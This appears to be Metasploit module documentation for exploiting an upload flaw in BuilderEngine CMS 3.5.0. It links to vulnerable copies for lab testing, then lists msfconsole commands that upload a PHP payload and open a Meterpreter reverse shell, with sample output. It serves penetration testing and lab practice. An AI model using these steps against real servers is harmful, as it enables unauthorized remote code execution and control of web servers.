BuilderEngine is a Content Management System (CMS) that is Open Source, and includes blog, eCommerce,
booking modules, etc. A vulnerability was found in the jQuery upload plugin, which could be abused
upload a malicious file, which would result in arbitrary remote code execution under the context of
the web server.

## Vulnerable Application

According to public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.

A vulnerable copy was collected by Exploit-DB, which can be downloaded here:

https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip

Another way to test this exploit is by using the Sedna image:

https://www.vulnhub.com/entry/hackfest2016-sedna,181/#

## Verification Steps

To see if the service is running BuilderEngine, you may use the check command from the module.
If the resource is found, then you may see the following output:

```
msf exploit(builderengine_upload_exec) > check
[*] 192.168.1.123:80 The target appears to be vulnerable.
```

Knowing that the ```jquery-file-upload``` plugin is available, you can try the by following these
steps:

1. In msfconsole, do ```exploit/multi/http/builderengine_upload_exec```
2. ```set RHOST [Target IP]```
3. ```set PAYLOAD php/meterpreter/reverse_tcp```
4. ```set LHOST [Your IP]```
5. ```exploit```

If exploited successfully, you should see an output similar to the following:

```
msf exploit(builderengine_upload_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[+] Our payload is at: RnrXvNHDaQA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.123
[*] Meterpreter session 3 opened (192.168.1.1:4444 -> 192.168.1.123:51354) at 2017-05-16 14:44:14 -0500
[+] Deleted RnrXvNHDaQA.php

meterpreter > 
```
